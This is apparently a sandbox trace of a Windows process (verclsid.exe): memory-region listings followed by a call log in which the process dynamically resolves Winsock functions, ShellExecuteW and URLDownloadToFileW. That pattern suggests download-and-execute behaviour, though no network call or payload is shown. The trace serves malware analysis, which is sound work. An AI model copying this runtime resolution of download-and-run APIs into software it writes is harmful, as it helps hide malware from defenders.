start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2374
start_va = 0x2600000
end_va = 0x2700fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 2375
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2376
start_va = 0x3a0000
end_va = 0x3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2377
start_va = 0x1d00000
end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 2378
start_va = 0x1d30000
end_va = 0x1d33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2379
start_va = 0x24d0000
end_va = 0x2535fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2380
start_va = 0x1dc0000
end_va = 0x1dcdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2381
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2382
start_va = 0x1dd0000
end_va = 0x1dd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001dd0000"
filename = ""
Region:
id = 3129
start_va = 0x1de0000
end_va = 0x1de0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001de0000"
filename = ""
Region:
id = 3130
start_va = 0x2280000
end_va = 0x2283fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 3131
start_va = 0x22b0000
end_va = 0x232ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 3193
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 3194
start_va = 0x2600000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3195
start_va = 0x2680000
end_va = 0x278ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 3196
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 3197
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 3198
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3199
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 3686
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 3687
start_va = 0x2790000
end_va = 0x289ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 3688
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 3691
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 3692
start_va = 0x2600000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3693
start_va = 0x26d0000
end_va = 0x282ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 3694
start_va = 0x7fef9220000
end_va = 0x7fef9234fff
monitored = 0
entry_point = 0x7fef92212a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 3695
start_va = 0x7fef9240000
end_va = 0x7fef9258fff
monitored = 0
entry_point = 0x7fef924177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 3696
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3697
start_va = 0x7fef9210000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef92112e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 3698
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 3699
start_va = 0x2600000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3700
start_va = 0x26c0000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 3701
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 3702
start_va = 0x2600000
end_va = 0x26cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 3703
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Thread:
id = 111
os_tid = 0x390
[0382.735] GetCurrentThreadId () returned 0x390
[0382.735] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x2178b0
[0382.737] SetThreadLocale (Locale=0x400) returned 1
[0382.739] GetVersion () returned 0x1db10106
[0382.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.739] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadPreferredUILanguages") returned 0x77664fd0
[0382.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.739] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadPreferredUILanguages") returned 0x77663d40
[0382.740] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77660000
[0382.740] GetProcAddress (hModule=0x77660000, lpProcName="GetThreadUILanguage") returned 0x776abba0
[0382.740] GetSystemInfo (in: lpSystemInfo=0x1cd9a0 | out: lpSystemInfo=0x1cd9a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0382.740] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.740] GetStartupInfoW (in: lpStartupInfo=0x1cd968 | out: lpStartupInfo=0x1cd968*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0382.740] GetACP () returned 0x4e4
[0382.740] GetCurrentThreadId () returned 0x390
[0382.740] GetVersion () returned 0x1db10106
[0382.741] GetVersionExW (in: lpVersionInformation=0x1cd8bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfd92bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀挀∀) | out: lpVersionInformation=0x1cd8bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0382.741] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef78f0000
[0382.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.750] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1e70000
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0382.751] GetProcAddress (hModule=0x7fef78f0000, lpProcName="closesocket") returned 0x7feffa118e0
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="select") returned 0x7feffa14da0
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1fa8d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="recvfrom") returned 0x7fef78f17ac
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="sendto") returned 0x7feffa1d7f0
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0382.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1fa8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0382.752] GetProcAddress (hModule=0x7fef78f0000, lpProcName="inet_addr") returned 0x7feffa11350
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1fa8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="htons") returned 0x7feffa11250
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="setsockopt") returned 0x7fef78f1664
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0382.753] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSAStartup") returned 0x7feffa14980
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0382.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1fa8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="socket") returned 0x7feffa1de90
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1fa8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSACleanup") returned 0x7feffa14cc0
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1fa8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="gethostbyname") returned 0x7feffa18df0
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1fa8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="send") returned 0x7feffa18000
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0382.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1fa8d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0382.754] GetProcAddress (hModule=0x7fef78f0000, lpProcName="connect") returned 0x7feffa145c0
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1fa8d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="recv") returned 0x7fef78f1744
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="gethostname") returned 0x7feffa1ae20
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1fa8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="inet_ntoa") returned 0x7feffa1d9a0
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0382.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1fa8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0382.755] GetProcAddress (hModule=0x7fef78f0000, lpProcName="ntohs") returned 0x7feffa11250
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1fa8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="WSAGetLastError") returned 0x7feffa11290
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="getpeername") returned 0x7feffa3e450
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0382.756] GetProcAddress (hModule=0x7fef78f0000, lpProcName="getsockname") returned 0x7feffa19480
[0382.756] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0382.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0382.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1fa8d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0382.766] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="ShellExecuteW") returned 0x7fefe20983c
[0382.767] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7fefdba0000
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0382.794] GetProcAddress (hModule=0x7fefdba0000, lpProcName="URLDownloadToFileW") returned 0x7fefdc395e4
[0382.794] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0382.794] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7feff630000
[0382.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0382.795] GetProcAddress (hModule=0x7feff630000, lpProcName="StrRetToStrW") returned 0x7feff641078
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0382.795] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe218660
